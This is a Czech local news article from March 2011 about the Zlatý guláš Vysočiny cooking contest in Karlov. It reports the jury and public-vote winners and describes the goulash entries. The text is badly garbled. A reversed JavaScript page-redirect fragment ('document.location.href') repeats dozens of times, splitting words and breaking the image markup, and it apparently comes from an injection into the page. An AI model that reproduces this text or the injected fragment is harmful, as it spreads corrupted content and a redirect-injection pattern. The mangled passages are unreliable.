Karlov, karlov, aktuality, guláš, soutěž
Rainbow page separator

Zlatý guláš Vysočiny uvařil vítěz ze zvěřiny

Neděle, 27. března 2011

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tores-karlov-11.jpg“>gulas-vysociny-mo<span style=[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tores-karlov-11″ src=“https://www.zdarskypruvodce.cz/zpo/uploads/uploads/gulas-vysociny-mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tores-karlov-11-300×200.jpg“ width=“300″ height=“200″ />Karlov/ Ve druhém ročníku kuchařské soutěže Zlatý guláš Vysočiny, který se konal v sobotu 26. března v Mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torestu GALERIE Karlov, zvítězil pokrm Petra Šmahela. Rozhodla o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom sedmičlenná porota, jíž předsedal známý bavič a herec Petr Novotný a nechyběla v ní mimo jiné ani zástupkyně Žďárského průvodce – Pavlína Mokrá. Vítěz klání Petr Šmahel svůj soutěžní výtvor uvařil ze srnčího masa tak dobře, že jej ocenili nejenom porotci, ale také veřejnost. Ta jej ve svém vlastním hlasování poslala na třetí mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to.

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tores-karlov-4.jpg“>gulas-vysociny-mo<span style=[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tores-karlov-4″ src=“https://www.zdarskypruvodce.cz/zpo/uploads/uploads/gulas-vysociny-mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tores-karlov-4-300×200.jpg“ width=“300″ height=“200″ />Právě hlasování laických návštěvníků akce byla oproti prvnímu ročníku novinkou. Přibližně třicet lidí, kteří se do bodování celkem dvaceti vzorků pustili, na druhé mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vysadilo hovězí guláš Miroslavy Markové. Nejvíce jim nakonec zachutnal guláš Miloše Ducháčka vyrobený taktéž z hovězího masa.
Verdikt poroty se od hlasování veřejnosti poněkud lišil. Po zlatém Petru Šmahelovi dostal nejlepší známky hovězí guláš pana Malého a třetí pozici obsadil pokrm z dílny soutěžící Bečkové. Ta o co nejlepší umístění bojovala s Babiččiným hovězím gulášem. A jaké další kulinářské výtvory soutěžící v sobotu do Karlova dovezli? Kroměhovězích gulášů nechyběl například guláš kuřecí, kančí, zmiňovaný vítězný srnčí nebo segedinský. Dostalo se i na vzorky vskutku netradiční – guláš s názvem Břišní tanec,guláš ze tří druhů zvěřiny, hovězí s buch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou, hovězí s povidlím a mnohé další.
[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tores-karlov-7.jpg“>gulas-vysociny-mo<span style=[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tores-karlov-7″ src=“https://www.zdarskypruvodce.cz/zpo/uploads/uploads/gulas-vysociny-mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tores-karlov-7-200×300.jpg“ width=“200″ height=“300″ />Na návštěvníky, kteří se v sobotu do karlovského mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torestu vypravili, nečekala ale jenom ochutnávka soutěžních gulášů. Mohli okusit také vína z Augustiánského sklepa ze Šardic, nejrůznější národní a místní kulinářské speciality nebo jenom relaxovat při poslechu živé hudby.